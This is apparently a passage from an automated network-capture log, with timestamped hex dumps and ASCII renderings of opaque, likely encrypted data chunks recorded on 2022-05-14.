                                                      Data Ascii: lBcuQ53-$s5%|eB1MKK=}/"C2Ri_H,E-PIgCje0<ZGPqmc"AI?C;s$rAi NwwI<NQU.-M&k"*Vvxi!.rkT!Y]:_,.J{\X-E]x
                                                      2022-05-14 13:16:00 UTC5INData Raw: bb 51 c7 4e 65 7a 4f 57 f5 2a ba eb b1 53 88 ba b5 c0 b2 b5 81 78 1a 04 67 02 9a eb b1 f2 4e c2 63 b3 1b aa 86 80 89 12 5e 29 37 86 7a 94 54 18 6f 48 ee 5d 21 f9 81 26 ff b6 7c ed c4 b7 cd ff 21 70 6b af 92 34 78 e7 7e 00 f4 6b 88 76 2e ba 2f b0 a0 71 58 04 4a af 62 20 fe fe 3c 46 72 45 df 12 20 1a 6d ab 82 de 83 3d f1 ba 83 69 97 a1 8f fe 98 4a 6e 37 e3 90 ec ce 8b 0b 95 1f 90 a5 ad ab 85 64 1c b9 1b c7 8f 98 f4 54 a9 5d 82 cd af 66 01 0e 26 1c b2 61 87 1d c0 ee a2 86 27 17 d1 7e cc db 85 2e a9 22 f9 60 26 81 6f d4 62 52 21 8e df 33 c6 cc 34 b1 a2 7a ff d5 10 73 b5 71 77 24 19 92 9b 46 24 7e 64 0b 4a 73 9d 36 5a 6f 53 03 6d 92 f6 0b a2 4a 4f d0 df b6 97 14 49 78 7f 3c f5 e0 f1 58 fa 53 b8 80 1e 25 4f 68 c7 a8 13 88 4f 1a a6 32 51 de 57 3e 41 09 4e 32 eb
                                                      Data Ascii: QNezOW*SxgNc^)7zToH]!&|!pk4x~kv./qXJb <FrE m=iJn7dT]f&a'~."`&obR!34zsqw$F$~dJs6ZoSmJOIx<XS%OhO2QW>AN2
                                                      2022-05-14 13:16:00 UTC6INData Raw: bb 7f 1b 86 ba 68 6c 1a 52 d5 db 23 4a 87 20 da 85 2d c3 72 a6 d7 d0 f4 49 c1 f7 16 d3 76 92 d0 bb 17 45 af a8 3b 3c 67 c0 53 96 a9 f0 21 09 5a e7 d6 65 b5 5e 5b 97 bb 07 1b 07 fb b7 97 c8 cf 5e 54 e5 a5 39 c7 21 2d b5 91 80 a9 62 71 1e eb b9 7e 96 2d 2f 0c 90 7a 84 0b df 33 9f 23 e0 65 d4 5f 7f 15 be ea 67 a0 e2 22 91 aa 81 35 7d 09 0b d5 5e f6 39 28 df 36 1f 7a c4 a6 ed f5 78 39 92 a7 2d 5a 86 82 4e 1c 3f 6e f5 db 58 e7 b0 88 81 14 96 a2 98 e1 35 94 50 75 f9 11 af 1d 18 48 27 41 6d 89 f5 f2 9a 69 b6 26 b8 10 60 30 c9 d5 96 ab c7 54 1e 85 73 7a 81 03 2e b2 ca 8e 4b 7a b0 3c 9f 93 61 7e ee bc 87 90 de cb e5 3d 34 8a 5d 25 60 a0 48 79 2e 0a 43 88 5a ec 38 8a 50 bb 73 7f 51 db 87 98 5c d3 8a 6b 6f cb 5d ab f0 ad d1 5c ca d1 9a 11 0e 34 c1 84 3c 09 47 f0 20
                                                      Data Ascii: hlR#J -rIvE;<gS!Ze^[^T9!-bq~-/z3#e_g"5}^9(6zx9-ZN?nX5PuH'Ami&`0Tsz.Kz<a~=4]%`Hy.CZ8PsQ\ko]\4<G
                                                      2022-05-14 13:16:00 UTC8INData Raw: 28 03 ac 11 8b 35 5b fb d8 ac 5f 73 1d 74 24 c8 ee a7 a4 9a e1 1b 5a f8 79 34 ef be b8 b2 f7 59 b1 ac 49 7d 88 dc e2 3c df eb 25 7d 17 38 74 67 de 87 c1 28 38 c9 90 9f 21 a4 85 ac 6b f9 f4 3a 72 0d bf 63 08 9a 09 9a ec 8d 35 1c 6e c8 6c 59 ac 5e 24 8b e8 19 a0 75 58 d1 cc 0a ff e7 19 bf 48 97 1f 35 b1 8a 39 a3 be 37 20 d3 6c 93 a4 30 0b 7c 2a a4 d8 3f cb 3f c9 3d 8b 50 e1 99 5c 63 30 ce a4 9f 48 d2 99 5e d7 89 c7 a0 11 05 c9 c6 c7 f7 9e 1a 4f cb da fd 24 76 18 f9 72 75 0c 2f 43 64 6e ec 5a 44 fd 5a d3 4d 6a e9 c0 86 e8 51 a3 bf 75 96 56 07 26 77 a6 b3 0d 12 41 fb 5b 03 36 f0 38 a8 ff c4 a7 46 9e 5c 75 38 b4 46 9a d9 33 bf c8 08 52 a0 d8 cd b2 fb f1 01 4d bb 72 39 c9 5c 48 08 15 29 df af a1 bc 8e 62 93 40 b6 34 72 6f da 5f b7 d2 39 b6 df 19 d5 25 87 88 1f
                                                      Data Ascii: (5[_st$Zy4YI}<%}8tg(8!k:rc5nlY^$uXH597 l0|*??=P\c0H^O$vru/CdnZDZMjQuV&wA[68F\u8F3RMr9\H)b@4ro_9%
                                                      2022-05-14 13:16:00 UTC9INData Raw: 1b a8 62 06 aa 9b b4 22 53 69 cc 35 4c 2e a1 b6 f9 38 54 f3 91 b7 e8 ee 7f af 8e b1 ff 81 b9 f7 4b a1 70 a2 d8 e0 4b af c1 fb a5 21 44 7f f6 77 da 1b 95 8b 47 16 22 ed 71 21 dc 34 ba 9c fa 5b 8d e8 10 f9 26 dd a0 80 a3 1b 53 5e 25 3b 6f ee 8a a0 e6 fe e3 a7 8c c0 db e7 ac 31 b6 79 1c 48 ba d0 80 a1 3a cf e2 ec c6 1e 64 70 ab 02 1d 5e 69 77 3c 2e bf 93 52 11 9b 26 66 ff be 64 ad 55 77 5f d1 cf 3e dd b3 2f 45 9a b0 40 d2 6e 1e c7 e3 03 37 d1 7d 9a 16 7d 3a 46 33 ad fc 93 f8 be 75 9b 83 2b d8 72 0b cf fd ec 4a 5d 0a 33 95 3c 00 fc b3 87 3f f0 4e 99 07 16 ca fa cb db c9 1c f3 f2 9d dc 1a d1 91 f7 4b 1c ca 19 41 4e 32 cf ab 06 22 8d 5f 9d a3 bd a5 0c 98 0c ad c3 ba 34 50 c0 6f f0 8b c2 57 f5 91 6c d9 ce a0 7a 00 b7 18 81 e7 5f f2 18 69 5d b6 a7 ba 78 a0 ab d3
                                                      Data Ascii: b"Si5L.8TKpK!DwG"q!4[&S^%;o1yH:dp^iw<.R&fdUw_>/E@n7}}:F3u+rJ]3<?NKAN2"_4PoWlz_i]x
                                                      2022-05-14 13:16:00 UTC10INData Raw: 52 b6 d5 37 3f 92 32 47 04 f5 c6 66 1c cd 7d 80 6f 57 d5 61 16 4c 17 ce 85 38 8d 39 3d eb 06 67 14 a2 a9 35 89 9d 57 2a 88 b2 44 67 87 d0 f1 c2 e2 b8 fc c5 c5 78 ba 5a 0b 6a f5 99 3d f5 47 e4 e9 24 ad 13 b6 ea 25 89 4f f2 cb 58 e3 57 31 aa 83 e1 fa 10 51 1b a8 3b 8f 41 ad 28 f6 96 02 18 c4 1b 67 89 93 f2 26 09 43 ec e4 08 66 b6 e3 f3 c6 86 c0 de 21 36 1c 72 83 02 b8 da 93 20 35 3b 23 ad 8f f1 ee 6b fa f8 58 88 e6 f5 05 e8 b3 5d 6a 22 d2 a2 cc e3 1a 10 2a 85 f0 23 1c a3 4c 8f 88 c7 d5 2b fd 99 a2 fd 09 ca 62 02 0e 32 99 3f b5 e5 02 ac 44 be 93 3f ac 38 66 1f 97 5b bd 20 d8 9e 46 f0 51 51 94 f6 fe 52 28 35 19 c2 52 f7 09 b8 d4 c2 3a 3d 02 79 57 ce 81 52 2f 39 bb 18 00 76 89 a3 bf 02 cf 25 91 90 fb 04 ca 9c ac 3f 4e 54 64 c8 e9 9e 66 85 59 95 8e dc 6d 93 ef
                                                      Data Ascii: R7?2Gf}oWaL89=g5W*DgxZj=G$%OXW1Q;A(g&Cf!6r 5;#kX]j"*#L+b2?D?8f[ FQQR(5R:=yWR/9v%?NTdfYm
                                                      2022-05-14 13:16:00 UTC12INData Raw: 89 99 6d a1 63 89 8c c5 d6 99 99 c5 1b 44 f0 9e 8b 11 32 31 92 85 28 a7 42 a1 fe 18 34 19 ed 27 d5 e9 6e 96 12 dd f9 70 ce 91 2b 8b c3 6b b0 07 26 f3 65 70 b8 59 57 12 00 20 c1 92 cf 57 68 7a 04 fc a4 4c 18 cb b9 2d 2d d9 d7 b2 84 f0 d6 fd b6 06 26 e4 0f 67 6b 18 c5 ee 5c 42 83 e0 2c 90 0f c7 74 03 30 43 0d ad 58 a3 33 ba 2d b7 3f f8 44 0f 20 04 e2 27 7c c1 9c 6c cf 1e 17 da f5 98 e7 df fe a2 4d b2 32 0c 59 08 03 58 45 10 f3 75 6a 0e 89 ea 1b 6a 2b 73 44 e7 62 e2 1b a3 63 7d 60 5c 9f 41 a2 f0 bb 70 84 ae 18 41 32 3a 3c 27 f7 00 48 f4 46 4d 0e ed 17 b2 40 c5 ce 0c 58 ac 80 fc b2 1e 80 19 bb d4 25 08 5a f7 85 86 e0 27 fb 10 fb 5a bb ba d1 fd 65 c8 cb 7c 49 03 a4 8a 94 81 45 17 b7 a2 38 60 4e dd 71 7d b7 b2 10 c2 42 d7 b7 9e f2 af 6d ba ce d3 6b 51 3e 53 ed
                                                      Data Ascii: mcD21(B4'np+k&epYW WhzL--&gk\B,t0CX3-?D '|lM2YXEujj+sDbc}`\ApA2:<'HFM@X%Z'Ze|IE8`Nq}BmkQ>S
                                                      2022-05-14 13:16:00 UTC13INData Raw: f8 60 4e d7 34 67 c9 bc c8 f7 62 b0 d6 34 a0 35 61 af 19 78 fa 24 95 89 30 25 2b 3b 7f 40 bf c5 41 68 8b 87 05 0a 1c 65 23 17 9c c8 6e 11 5f d9 3a cf 32 c0 db 21 18 99 7f 4b 72 e6 e7 a6 8a c3 0b 64 4e 2b 90 da 54 7f 17 b6 03 0d 8e e8 a5 54 e4 44 2c 60 2a 4a 3e f3 a6 80 0a 99 64 d2 6e 4d 0a 45 f2 65 97 32 77 d4 55 df 0d 69 8e 06 62 c2 9f 9c bb 9f 7b 76 ec 25 09 0b de 71 33 01 ab f1 0b 3e af 7e 8f a6 03 31 35 dd d6 76 49 73 e3 25 d6 f0 58 ef a1 c6 84 c6 68 7a 95 e6 74 79 ea b8 a6 ec e3 12 ec 34 33 41 dc 27 43 52 0c 54 84 80 0d 5d 79 2f b1 b1 46 1b cd 75 77 1d 88 a6 e7 8a a1 26 17 c8 5e db eb 0e 72 aa 39 9a 70 d7 eb 65 80 9b 03 19 18 3e 95 36 b0 9d f3 fc 12 fb 8f 50 d2 33 8b dc b0 da f7 70 a3 56 5b 03 88 ba 31 78 f4 da 08 97 d0 4c cb 52 06 ff 80 15 24 49 41
                                                      Data Ascii: `N4gb45ax$0%+;@Ahe#n_:2!KrdN+TTD,`*J>dnMEe2wUib{v%q3>~15vIs%Xhzty43A'CRT]y/Fuw&^r9pe>6P3pV[1xLR$IA
                                                      2022-05-14 13:16:00 UTC14INData Raw: 7e ce 17 51 b8 59 80 59 da f3 6c f4 0e 01 fc 05 16 0e 58 b5 4a 3d fa e5 8e fd a6 1b 0b 8e dc ec c3 dc 26 de eb 66 b3 80 7d 4a 7e 2c c2 bd d6 49 25 ae e2 15 bb 4c 0e 5c 42 75 26 e4 9f 81 06 42 51 07 00 45 d7 ff 25 2a cb 1e 44 7b 84 4b a8 00 8d 1c 03 2e 58 67 0f 98 e8 84 4f 88 a2 06 fc 08 98 3e 9c 74 b6 40 f8 3d 8f 41 2b af 9d e2 21 7d 9d 0b bf b1 a5 fb 1f a7 e1 3f 99 ff 3c 89 6c dd 0d 1b b4 54 e4 ac 56 3f 2c 61 0a 3b b7 98 bd f3 7f df e7 ee 1a 25 34 92 14 19 c2 8a 6b 66 53 36 4a ae 1f 34 df f4 ed e6 37 a6 a1 17 6f b5 05 34 16 f6 c3 82 a3 cd 63 cb f6 95 16 05 cc 6a 58 af b9 fb 5c ae 8d 55 68 99 34 1a 30 79 7a ba e0 ce 65 7a 24 89 98 57 20 16 b9 eb 21 36 72 2c 8a 42 dd 91 35 b4 df 9d 63 ea 54 88 1b 83 67 bd 60 73 de a7 e8 f6 8c f3 8a a6 b7 83 44 1b f6 c1 ad
                                                      Data Ascii: ~QYYlXJ=&f}J~,I%L\Bu&BQE%*D{K.XgO>t@=A+!}?<lTV?,a;%4kfS6J47o4cjX\Uh40yzez$W !6r,B5cTg`sD
                                                      2022-05-14 13:16:00 UTC16INData Raw: b4 58 e5 cc 5d 8d 7f 75 5d ed 28 21 83 83 5d 93 b3 01 ca 80 5c 7e 3a 2b 45 9e 60 2e c6 6c c5 96 f9 e7 18 98 84 f9 de ec 31 0f 34 56 70 b4 a8 47 bc f0 d0 b8 ed 37 ab 66 63 a9 09 d2 37 d2 d2 03 bc 2f 99 a1 fa a6 75 bd cc 2f 91 53 a0 f2 0c cc 51 ec 12 92 a3 f3 c8 1f 38 f3 3c b4 8f 3e d0 26 92 31 86 bf b1 6b 27 c4 92 70 88 2b d1 47 0f e9 c6 62 c7 8c ca 29 1a 9b 84 d7 8f c5 46 f1 bf 3e 9c 58 56 c2 d2 6b c8 d2 95 99 1c 02 91 8f 17 14 6b d4 e4 98 53 f5 1c 0e af fa a2 f0 d9 73 19 c4 86 60 4d 14 ef 11 59 09 87 db 68 fe 4c 72 a9 3a 70 c4 3f 57 97 64 3b c0 e2 55 8c 45 a9 f7 95 5b a4 31 e4 f7 c2 a4 db 11 64 e3 8e 00 c5 31 04 f6 b3 3a a0 98 d5 10 0f a6 58 b9 e3 c4 cb e5 c5 28 44 1d 09 a3 90 19 ad 62 88 bb a4 bf e7 ae 0a 29 18 f4 22 42 75 e1 26 00 ab 67 91 dc a4 61 c9
                                                      Data Ascii: X]u](!]\~:+E`.l14VpG7fc7/u/SQ8<>&1k'p+Gb)F>XVkkSs`MYhLr:p?Wd;UE[1d1:X(Db)"Bu&ga
                                                      2022-05-14 13:16:00 UTC17INData Raw: 57 37 c0 6c 42 8e e7 83 77 59 5e 51 7a eb 23 ef b9 d3 58 8e 8f d9 bb 38 ed 20 70 ed 5f 24 1b 06 a4 e9 50 c5 ff 80 ad f7 83 9c 2b 9a 84 20 5a f7 5a 42 b3 f0 97 81 4e 98 1b 87 86 71 af fb 3d 9c 80 29 09 ba 47 d5 58 49 46 94 c6 a9 1c da 1d b0 7b ad c0 d4 98 f2 3b 3c 6a bb 66 14 20 f1 ff fe e4 20 55 16 f6 4d c6 1d 61 85 d4 af 6d ca fe 4c f3 a6 9f 61 d2 a5 eb 9f c6 1e 61 68 b4 95 a9 72 64 cd 7d 43 4c 2f 33 4c f6 84 25 0f 85 05 5b db 4e ef 3c 64 13 4f 77 e6 8c a7 9a b8 d6 18 72 5c e9 51 9c 5e 91 4f ac 5e ff 13 a5 81 a3 77 e9 27 76 d7 6d 9b 73 db e6 aa 51 cf 66 75 43 a5 85 b1 4f 2f a9 c0 8e e4 78 03 91 a4 f0 a8 9a 23 6b 5f 27 3d 21 70 b9 a4 77 8b 6c 14 cb c7 33 03 40 a1 21 a6 01 48 b2 f7 f4 2a 4d dc b6 57 62 d8 c9 ad e3 d9 22 67 83 fa 5f fb 58 07 fe 53 4b c2 d8
                                                      Data Ascii: W7lBwY^Qz#X8 p_$P+ ZZBNq=)GXIF{;<jf UMamLaahrd}CL/3L%[N<dOwr\Q^O^w'vmsQfuCO/x#k_'=!pwl3@!H*MWb"g_XSK
                                                      2022-05-14 13:16:00 UTC18INData Raw: ee 53 d2 db db e3 eb f7 70 73 a1 fe 08 a8 69 6c bf 96 75 2a 2f 5f 84 50 9f 72 5b c2 d2 14 cc a8 80 8a 02 3a 86 e4 8d fd 3b 2e 77 0a 7d 3c af 98 49 bd 2f 66 9a 9f b1 c2 58 33 a6 ce 62 8f 58 06 3d 6b 8f 4f 96 c3 7b 7b 15 18 03 a7 8d 1f 6b 6e da b4 d1 19 df a1 8a d9 4d 92 0c 52 ac 5d f2 5d 3d 18 55 d0 b5 a0 f8 65 45 6d 7b 3c 79 42 d6 dc a6 78 c0 49 3a c4 af 24 4b fa 5f 12 c0 61 a5 20 02 fa 19 cf 8f f2 f2 83 ab f7 18 43 a4 0c 9a ec 75 0f 82 00 9e 8e e1 ba 3d b9 ea 43 80 fe 85 6c c1 3b 97 09 f0 eb 2f d4 a7 f0 72 7e 55 47 d5 66 83 53 e9 56 7f 0f db a3 f7 c1 19 9a cd 77 69 5a ed d8 65 6e bf 38 5d 5a 7b d5 f0 45 a8 68 82 51 8e d9 7d d1 dc 64 01 f1 a9 4e e5 bc 0f ee 25 9a 4e 72 b2 d0 87 5d 96 bb cd 2d 14 c1 3c c0 19 29 76 87 33 b7 ec 50 18 c2 b8 ec 80 9e 2f b2 4a
                                                      Data Ascii: Spsilu*/_Pr[:;.w}<I/fX3bX=kO{{knMR]]=UeEm{<yBxI:$K_a Cu=Cl;/r~UGfSVwiZen8]Z{EhQ}dN%Nr]-<)v3P/J
                                                      2022-05-14 13:16:00 UTC20INData Raw: 58 07 33 7b 47 37 6a 69 6b 3a ec 12 f6 4f 62 67 ec 92 47 c8 53 15 14 e0 44 f9 c5 30 e5 00 ed 26 d3 99 18 b5 f8 a6 60 a2 bc 69 ae f2 ff 9b 74 d8 11 0a 88 81 4c 48 eb cb 41 8c e1 26 40 a8 5d a1 a5 37 d3 ab 7a a5 e9 07 f0 67 30 db 58 96 bb 73 d1 74 31 e7 99 a9 f8 e8 e7 ba d8 93 dd c3 08 3a 5e 20 38 0d e3 00 bd ad d4 3d f5 f6 c0 51 e0 28 24 30 a6 66 8d f2 17 9d 5e ef ca 68 cd eb b5 1c 87 74 76 f5 20 cd f1 eb ca 09 fc f6 12 93 e3 44 6c a0 69 5b 40 df eb e1 0f eb a1 5c b0 df f4 63 af 46 f0 e9 38 0d 89 85 b4 11 df ad cf 54 3c fa 40 dd a6 58 47 44 5f b9 0d b3 24 9a 52 45 71 76 ab 2c ed 07 5a 5e 31 0c 37 da a3 11 36 0b 0e 8d 0b 61 5a 7b 87 ad cb 67 c9 53 29 fe ab d1 99 f5 9f 6f d5 fa 1d 94 1c 4a ff a9 bd bd 14 e5 63 6f 73 40 42 39 5f f9 16 21 4c 94 5b 8e 3f d3 2c
                                                      Data Ascii: X3{G7jik:ObgGSD0&`itLHA&@]7zg0Xst1:^ 8=Q($0f^htv Dli[@\cF8T<@XGD_$REqv,Z^176aZ{gS)oJcos@B9_!L[?,
                                                      2022-05-14 13:16:00 UTC21INData Raw: 8b cf 07 59 94 d5 3a dd 0f 6c 84 d1 1f 7f 00 52 c1 2c 1c cd 20 c3 e2 54 5d 7f cc 27 da f5 b3 23 7a 5c e4 45 06 e3 fd 33 f8 d0 61 5a 1c 64 11 b3 aa 10 c0 ab 1c 18 b7 64 aa ca 22 a8 ab 8b 3c d7 79 02 fa 6b 53 04 df 02 b4 13 2a b2 0d fa e2 ff 4b ec 4f 11 3c 70 a1 80 f8 9b cc f9 31 d3 1b 9c 3a 07 ef b7 23 d0 57 0a 89 66 90 94 8f 7b 34 9e 81 b7 76 1e 16 52 e6 19 b3 84 15 d7 82 98 81 02 ac 7c 1a af ba 8c 28 ca b2 9d 2f 36 c8 a3 cf 79 4d e0 89 11 45 ea 65 73 49 2e 1c a5 0e 07 4b 90 4f 51 a1 b7 88 c3 b0 95 a5 df ee 39 e0 08 77 60 27 56 43 49 86 b3 d0 10 8c 2f c4 db aa ac 26 1f ec ac ac a1 68 34 f0 0b d6 a4 1f 94 40 eb 2d 84 68 36 37 05 f4 a7 f6 5e b2 8e 13 a3 7b 29 0b ed 90 57 b4 1a 6b 54 29 e1 f6 16 d3 9d 6e bd 73 b1 d1 85 64 8a c2 98 29 e5 24 df 01 6d 0b a3 78
                                                      Data Ascii: Y:lR, T]'#z\E3aZdd"<ykS*KO<p1:#Wf{4vR|(/6yMEesI.KOQ9w`'VCI/&h4@-h67^{)WkT)nsd)$mx
                                                      2022-05-14 13:16:00 UTC22INData Raw: 4a 32 21 46 7e 2a b1 ca 0e c1 78 46 21 3f 32 6e 83 0d 34 34 95 5f 1f 2a 5e f3 e8 af 45 98 52 2c a9 a1 c7 14 28 4b 1d b6 7b e9 38 61 50 a5 00 ce 59 da 84 01 dd 03 e5 3d 9f fe 6e 5c 96 03 6a 6b ed 95 5b ae 03 e6 3e 23 79 28 b5 b1 42 87 27 ec b5 da d5 86 7a e9 cb fc 18 d4 fa 0b 09 86 73 7c 5a 5a 58 e8 03 30 67 9a c3 cf 2f 59 02 a3 66 b4 9e cc 0c 97 28 5c 19 7c 5e 21 85 e1 8b 7d e6 15 1d e7 89 b7 bf b0 69 6d 1b ce 29 a8 db fc b9 ed 7b fe 94 4c f9 ad d5 c4 a9 13 e2 63 f5 60 e2 85 fd 9d d3 ee 0c 22 a0 01 e7 4e 7f ab 08 3f b4 61 4d a2 83 cb 18 61 e6 ee 3c a4 1c 26 4d af 7c 98 eb 49 d6 a3 f8 96 94 08 0e 86 7f bd 6b 4a 4e 85 76 aa bd a9 11 ce a6 58 90 a4 c7 1f 7d e6 71 8b 65 40 65 11 72 a8 d5 37 73 f1 df bd 53 36 0c 45 2c 30 06 d2 7c 16 29 0d 90 1f 42 71 44 0b c4
                                                      Data Ascii: J2!F~*xF!?2n44_*^ER,(K{8aPY=n\jk[>#y(B'zs|ZZX0g/Yf(\|^!}im){Lc`"N?aMa<&M|IkJNvX}qe@er7sS6E,0|)BqD
                                                      2022-05-14 13:16:00 UTC24INData Raw: 1f 50 3f fe b5 6f ba 71 af 1a c5 5a 84 47 ec 1c b3 27 61 b9 37 8e 64 1d 1d 5b a9 23 97 e5 ed 7b c5 9f 0b 5d 22 9d 86 ae 9d 4e f7 49 e3 c3 af 91 44 1f 89 d7 39 f4 e2 64 c3 25 27 9b 43 ea 57 7b 43 8e 8b e7 21 5f 3d e8 12 41 44 2c d7 2d 8e 00 72 ff 88 41 31 ce 4e 93 51 f9 25 a9 1a ed 22 72 1a 67 5d d4 98 f0 25 9b 78 8c ca d2 7b 1e 3c 0a 4b f4 89 1c 2c 3c 3f c0 87 8c fc a8 84 a5 89 e1 e8 30 a6 4d 06 3f 27 1e 7b cf 00 e8 4c 3f 80 55 d1 dd 47 ec 82 58 55 ba a0 48 13 af 58 38 3d 1b 87 f5 4d 54 a2 93 38 21 2c 1c c7 37 8b 9a 6e 72 ba 79 91 70 ed f8 8c 85 66 ed c9 9c d2 b8 b1 32 e0 b3 16 fc d6 10 1f 10 61 f8 02 c4 4c 45 c2 94 7c 93 05 1b db 5d b7 5e 8d 06 96 f7 f3 55 cb d5 2c 6d fd 8a c6 58 03 38 30 7b e7 11 e7 a6 b1 2c 8c a6 7e 47 3c 60 dd e5 69 63 cd ed 7f 69 64
                                                      Data Ascii: P?oqZG'a7d[#{]"NID9d%'CW{C!_=AD,-rA1NQ%"rg]%x{<K,<?0M?'{L?UGXUHX8=MT8!,7nrypf2aLE|]^U,mX80{,~G<`icid
                                                      2022-05-14 13:16:00 UTC25INData Raw: 4d 07 5e 6a aa 39 c4 43 c1 96 ef d0 c1 e1 c8 8e 34 50 fd 64 b7 70 09 26 12 65 e5 65 a3 93 92 31 fc 19 8f 2c 5e f5 89 6e 39 b1 ca 96 7f 16 e5 ae 96 f6 bb fd b8 d5 7a 68 11 5f 8e 6e 3c ec 27 ec 49 17 d8 92 6c ec f6 f5 c3 8c ff a0 cf ca eb 69 b5 a1 c5 db 34 81 b7 8f 05 fa f6 7b 03 ce bb 7e ef ed 6a 1b ad 10 16 bb f8 70 55 6d 94 89 7d 5e 54 80 66 0f c8 4e 07 5f 54 b6 ff 77 d4 d8 cd a9 b6 77 0a 87 4c ba d4 d9 6d a8 c7 38 fa 51 43 5a a3 0f 8a 29 ed 95 12 e3 3c 96 74 f3 ad 69 ae e9 81 b3 18 69 38 5f 9f 37 bf ec 41 af 5a e3 82 da 69 6c db 81 2c 21 3c ff 54 cc 5e 23 5d b4 48 34 9a e3 19 0a 06 8d c2 6f dc 1b 35 0c 3a 57 8a 5a eb f0 2c 80 ab b6 72 22 b1 10 a6 9b e8 b6 9a e9 a4 97 be ba bb 24 a3 ab b0 33 7d 80 53 5d 4b b1 23 64 91 2b 54 cd e4 c3 40 9f 53 30 6c 1c 28
                                                      Data Ascii: M^j9C4Pdp&ee1,^n9zh_n<'Ili4{~jpUm}^TfN_TwwLm8QCZ)<tii8_7AZil,!<T^#]H4o5:WZ,r"$3}S]K#d+T@S0l(
                                                      2022-05-14 13:16:00 UTC26INData Raw: 52 35 db f1 c9 9d 08 9c bb 52 da 56 aa c5 f0 b5 95 15 66 be 45 88 e4 12 72 72 5d bb 04 d9 0f d6 cd 06 1a 8a ca 6e 73 b1 76 ad 75 c1 db 85 e8 94 70 10 9a 59 bd 40 98 a7 45 6a 88 8d a4 d4 3d fc 4c 31 b0 6a 9b a0 c9 fd 0b 18 1f 03 30 f8 ab 50 a2 cf cf d3 2e 06 45 8e fa 4c 92 20 bd f9 ad 43 96 67 d4 9b d0 3d d6 a7 fd 8a db e1 db 1d 9e aa 3b ad 68 dc 4a e8 46 a2 6a 3f 4f 10 d7 2e 5d fa c0 ba b3 e0 34 86 1d 44 5f a3 99 28 e3 11 a8 4d c1 49 78 48 b7 d5 68 dc b0 be 80 50 33 05 cd 4b e7 17 2e 6b 82 8c a2 9a 2b 31 84 36 28 b5 13 f6 eb da 7b 27 47 45 92 f4 f6 87 86 b5 e6 f5 bb c1 e1 ef fa e6 b8 a3 97 02 0f 67 01 8f d5 c3 be 6b 02 c7 b1 74 8f ce b4 7d 2f 88 87 07 ff 04 2c e3 7a ad 5d 76 d7 f7 bc 2c 26 d8 c0 8b 82 f7 80 45 2f 08 d1 53 94 0e 71 90 f2 f3 34 72 a1 ab 51
                                                      Data Ascii: R5RVfErr]nsvupY@Ej=L1j0P.EL Cg=;hJFj?O.]4D_(MIxHhP3K.k+16({'GEgkt}/,z]v,&E/Sq4rQ
                                                      2022-05-14 13:16:00 UTC28INData Raw: f7 23 cc 25 62 28 ee 37 ef de fc cd aa 66 cf 0c 39 15 0c 7c f8 3b b9 44 8d 76 a1 e7 35 c0 3f 3e 5b 52 fa 4f 03 6a 74 b6 54 4d 50 c5 1a 3c cc 0f 72 7f 1f 4a 44 e6 fa a7 6c 98 e6 f7 20 e9 e4 16 86 fb c0 9b 5b eb 32 0b ba b1 68 25 f8 cf 0b 48 53 1a 0c f4 6e 22 92 23 4e e5 5e 16 8b 70 60 9c 93 11 62 63 f3 e3 ef e2 b2 d2 1c fb 9f 28 63 66 4e 53 50 ec d9 8a 8a 5a e0 09 70 04 93 02 fa b1 39 c2 9f 98 a8 8d fd b4 01 46 45 ee b1 1f 7e 95 28 be 4a 2d 50 0c 74 f2 13 e1 45 c0 88 af e9 33 ab f4 50 eb 9f ab 99 b6 d3 13 90 50 ee 76 28 af a5 57 c9 e9 41 d4 91 93 39 58 ea c7 25 49 d0 47 d1 cd 72 36 1a d6 ef db 7d e1 7c 22 ee 3c ae 5b 6d 2a c0 cb 58 4e 66 dc 5e b8 a3 dc 24 ea 07 4e 87 a9 a9 8c 6b 84 41 74 4b 5c 2b 5c cc a5 7d 66 f1 9a 2a 86 db ca ab c1 37 04 5f 42 c2 b6 8d
                                                      Data Ascii: #%b(7f9|;Dv5?>[ROjtTMP<rJDl [2h%HSn"#N^p`bc(cfNSPZp9FE~(J-PtE3PPv(WA9X%IGr6}|"<[m*XNf^$NkAtK\+\}f*7_B
                                                      2022-05-14 13:16:00 UTC29INData Raw: 6f ec 99 14 52 a5 9c 0b 50 82 28 7c f2 a6 6c 38 d4 d2 e6 19 f3 44 84 6d e1 56 90 46 23 f2 4f 62 b8 38 5d 0e 29 23 85 a1 3b d9 a0 31 9e 03 cb cc 35 a8 87 b8 91 6b a1 f2 d3 4c fd 60 d7 83 5e 68 13 1f 6d fa 1b 5d dc 42 78 bb 03 60 6c 6b 7f 2c 13 8b b9 1e ac 2d 5e 82 e1 a6 b4 85 be 26 63 77 60 25 27 02 a3 88 c7 6a ca 7d 61 a9 ed 90 1a c5 ee 9a 2f c0 f7 ed 1f a0 bd c3 59 7c 9f 85 75 b7 40 7c 44 d5 f5 fd 61 c5 a4 15 4f dd 54 52 0d 15 b5 24 74 e2 20 7a 90 51 2c 62 68 f7 17 42 c8 16 ad 2a e4 40 2b dd d6 1a b4 76 a5 87 ad c0 b7 a3 f2 fc b6 70 60 09 f5 5b f7 d3 a7 5b 7c 56 b0 43 6c 8d f0 fa 84 0e bf ff 33 7c 68 28 64 3b ed d5 59 07 38 6b dc af d7 4f 90 ef 1e a3 dc 4c 39 19 21 69 5d b0 73 c0 27 7c 4e 28 7b dd 0e e7 2f 1d 6d ff 65 b9 26 b1 c4 b1 f8 5e 10 c3 bc 8b 48
                                                      Data Ascii: oRP(|l8DmVF#Ob8])#;15kL`^hm]Bx`lk,-^&cw`%'j}a/Y|u@|DaOTR$t zQ,bhB*@+vp`[[|VCl3|h(d;Y8kOL9!i]s'|N({/me&^H
                                                      2022-05-14 13:16:00 UTC30INData Raw: 9d 1f da bb 1b 8b 3d 79 6b 36 1d b5 87 b3 14 78 67 29 27 d7 d2 4e 52 fd d6 a2 66 2b 06 05 1f 72 30 8d b5 80 0a d7 84 50 47 14 d9 67 6f 79 4f cb bb 60 d3 8a 53 44 fe ac 27 6d 68 bd 79 8a 84 8d b3 30 a6 da 35 de 21 d5 85 43 90 35 8d 00 22 91 37 01 9c f2 4f 0d 14 f3 17 fd 23 7d 82 fc 20 ec d8 6e 84 cd 45 33 36 32 86 28 5a 7c 32 0a b8 67 8d b0 87 8d bb c9 47 77 ee 8e af 9a 39 02 2c dd 45 cc 70 69 9f 5c cb 94 c4 35 0e 71 a0 41 f6 f3 c8 ec 83 ec 37 13 4a 90 3d b4 41 36 d9 e2 36 ac c1 1e d1 5e c6 0f 2b 78 e6 d3 58 56 9e 5e 40 cb 4c c8 6e c2 36 95 b0 fe bd b5 f1 eb 57 dc 96 d2 f6 11 2b 31 7d b1 00 04 80 31 